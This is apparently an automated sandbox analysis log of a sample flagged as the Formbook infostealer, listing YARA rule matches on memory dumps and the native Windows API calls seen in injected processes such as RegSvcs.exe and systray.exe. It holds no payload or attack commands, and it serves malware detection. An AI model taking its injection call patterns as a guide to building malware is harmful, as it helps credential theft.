Source: Yara match	File source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 22#U0415.exe PID: 6372, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 3848, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: tsnokiirph.exe PID: 7108, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: systray.exe PID: 3264, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 7080, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.22#U0415.exe.29515f0.4.raw.unpack, gk.cs	Large array initialization: : array initializer size 9417
Source: 0.2.22#U0415.exe.8dd0000.11.raw.unpack, gk.cs	Large array initialization: : array initializer size 9417
Source: 8.2.tsnokiirph.exe.3431860.8.raw.unpack, gk.cs	Large array initialization: : array initializer size 9417

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041A350 NtCreateFile,	6_2_0041A350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041A400 NtReadFile,	6_2_0041A400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041A480 NtClose,	6_2_0041A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041A530 NtAllocateVirtualMemory,	6_2_0041A530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041A47C NtClose,	6_2_0041A47C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041A52C NtAllocateVirtualMemory,	6_2_0041A52C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632B60 NtClose,LdrInitializeThunk,	6_2_01632B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_01632BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632AD0 NtReadFile,LdrInitializeThunk,	6_2_01632AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_01632D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_01632D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_01632DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632DD0 NtDelayExecution,LdrInitializeThunk,	6_2_01632DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_01632C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_01632CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632F30 NtCreateSection,LdrInitializeThunk,	6_2_01632F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632FE0 NtCreateFile,LdrInitializeThunk,	6_2_01632FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632FB0 NtResumeThread,LdrInitializeThunk,	6_2_01632FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632F90 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_01632F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_01632EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_01632E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01634340 NtSetContextThread,	6_2_01634340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01634650 NtSuspendThread,	6_2_01634650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632BE0 NtQueryValueKey,	6_2_01632BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632BA0 NtEnumerateValueKey,	6_2_01632BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632B80 NtQueryInformationFile,	6_2_01632B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632AF0 NtWriteFile,	6_2_01632AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632AB0 NtWaitForSingleObject,	6_2_01632AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632D00 NtSetInformationFile,	6_2_01632D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632DB0 NtEnumerateKey,	6_2_01632DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632C60 NtCreateKey,	6_2_01632C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632C00 NtQueryInformationProcess,	6_2_01632C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632CF0 NtOpenProcess,	6_2_01632CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632CC0 NtQueryVirtualMemory,	6_2_01632CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632F60 NtCreateProcessEx,	6_2_01632F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632FA0 NtQuerySection,	6_2_01632FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632E30 NtWriteVirtualMemory,	6_2_01632E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632EE0 NtQueueApcThread,	6_2_01632EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01633010 NtOpenDirectoryObject,	6_2_01633010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01633090 NtSetValueKey,	6_2_01633090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016335C0 NtCreateMutant,	6_2_016335C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016339B0 NtGetContextThread,	6_2_016339B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01633D70 NtOpenThread,	6_2_01633D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01633D10 NtOpenProcessToken,	6_2_01633D10
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4E8E12 NtProtectVirtualMemory,	7_2_0F4E8E12
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4E7232 NtCreateFile,	7_2_0F4E7232
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4E8E0A NtProtectVirtualMemory,	7_2_0F4E8E0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2CA0 NtQueryInformationToken,LdrInitializeThunk,	12_2_04DC2CA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_04DC2C70
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2C60 NtCreateKey,LdrInitializeThunk,	12_2_04DC2C60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2DD0 NtDelayExecution,LdrInitializeThunk,	12_2_04DC2DD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_04DC2DF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2D10 NtMapViewOfSection,LdrInitializeThunk,	12_2_04DC2D10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	12_2_04DC2EA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2FE0 NtCreateFile,LdrInitializeThunk,	12_2_04DC2FE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2F30 NtCreateSection,LdrInitializeThunk,	12_2_04DC2F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2AD0 NtReadFile,LdrInitializeThunk,	12_2_04DC2AD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_04DC2BF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2BE0 NtQueryValueKey,LdrInitializeThunk,	12_2_04DC2BE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2B60 NtClose,LdrInitializeThunk,	12_2_04DC2B60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC35C0 NtCreateMutant,LdrInitializeThunk,	12_2_04DC35C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC4650 NtSuspendThread,	12_2_04DC4650
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC4340 NtSetContextThread,	12_2_04DC4340
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2CC0 NtQueryVirtualMemory,	12_2_04DC2CC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2CF0 NtOpenProcess,	12_2_04DC2CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2C00 NtQueryInformationProcess,	12_2_04DC2C00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2DB0 NtEnumerateKey,	12_2_04DC2DB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2D00 NtSetInformationFile,	12_2_04DC2D00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2D30 NtUnmapViewOfSection,	12_2_04DC2D30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2EE0 NtQueueApcThread,	12_2_04DC2EE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2E80 NtReadVirtualMemory,	12_2_04DC2E80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2E30 NtWriteVirtualMemory,	12_2_04DC2E30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2F90 NtProtectVirtualMemory,	12_2_04DC2F90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2FB0 NtResumeThread,	12_2_04DC2FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2FA0 NtQuerySection,	12_2_04DC2FA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2F60 NtCreateProcessEx,	12_2_04DC2F60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2AF0 NtWriteFile,	12_2_04DC2AF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2AB0 NtWaitForSingleObject,	12_2_04DC2AB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2B80 NtQueryInformationFile,	12_2_04DC2B80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC2BA0 NtEnumerateValueKey,	12_2_04DC2BA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC3090 NtSetValueKey,	12_2_04DC3090
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC3010 NtOpenDirectoryObject,	12_2_04DC3010
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC3D70 NtOpenThread,	12_2_04DC3D70
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC3D10 NtOpenProcessToken,	12_2_04DC3D10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_04DC39B0 NtGetContextThread,	12_2_04DC39B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E8A350 NtCreateFile,	12_2_02E8A350
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E8A480 NtClose,	12_2_02E8A480
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E8A400 NtReadFile,	12_2_02E8A400
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E8A530 NtAllocateVirtualMemory,	12_2_02E8A530
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E8A47C NtClose,	12_2_02E8A47C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 12_2_02E8A52C NtAllocateVirtualMemory,	12_2_02E8A52C

Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_02732650	0_2_02732650
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_02731428	0_2_02731428
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_027334F0	0_2_027334F0
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_02731BB8	0_2_02731BB8
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_027308D1	0_2_027308D1
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_027343F0	0_2_027343F0
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_027343E0	0_2_027343E0
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_0273138B	0_2_0273138B
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_02732098	0_2_02732098
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_027357E0	0_2_027357E0
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_027357D3	0_2_027357D3
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_02733408	0_2_02733408
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_027355C0	0_2_027355C0
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_027355B3	0_2_027355B3
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_02735A50	0_2_02735A50
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_02735A58	0_2_02735A58
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_02735BF8	0_2_02735BF8
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_02734F18	0_2_02734F18
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_02734F0B	0_2_02734F0B
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_04E589C8	0_2_04E589C8
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_04E589D8	0_2_04E589D8
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_04E5698C	0_2_04E5698C
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_09433AF9	0_2_09433AF9
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_09434210	0_2_09434210
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_094395F8	0_2_094395F8
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_09431F08	0_2_09431F08
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_09431EF7	0_2_09431EF7
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_09434201	0_2_09434201
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0040102C	6_2_0040102C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041DB2A	6_2_0041DB2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00402D87	6_2_00402D87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041D596	6_2_0041D596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00409E4B	6_2_00409E4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00409E50	6_2_00409E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041DE5E	6_2_0041DE5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041E7A0	6_2_0041E7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01688158	6_2_01688158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F0100	6_2_015F0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169A118	6_2_0169A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B81CC	6_2_016B81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C01AA	6_2_016C01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B41A2	6_2_016B41A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01692000	6_2_01692000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BA352	6_2_016BA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C03E6	6_2_016C03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160E3F0	6_2_0160E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016802C0	6_2_016802C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600535	6_2_01600535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C0591	6_2_016C0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B2446	6_2_016B2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A4420	6_2_016A4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016AE4F6	6_2_016AE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01624750	6_2_01624750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FC7C0	6_2_015FC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161C6E0	6_2_0161C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01616962	6_2_01616962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016CA9A6	6_2_016CA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160A840	6_2_0160A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01602840	6_2_01602840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E8F0	6_2_0162E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015E68B8	6_2_015E68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BAB40	6_2_016BAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B6BD7	6_2_016B6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FEA80	6_2_015FEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160AD00	6_2_0160AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169CD1F	6_2_0169CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FADE0	6_2_015FADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01618DBF	6_2_01618DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600C00	6_2_01600C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F0CF2	6_2_015F0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0CB5	6_2_016A0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01674F40	6_2_01674F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01642F28	6_2_01642F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01620F30	6_2_01620F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A2F30	6_2_016A2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F2FC8	6_2_015F2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167EFA0	6_2_0167EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600E59	6_2_01600E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BEE26	6_2_016BEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BEEDB	6_2_016BEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01612E90	6_2_01612E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BCE93	6_2_016BCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016CB16B	6_2_016CB16B
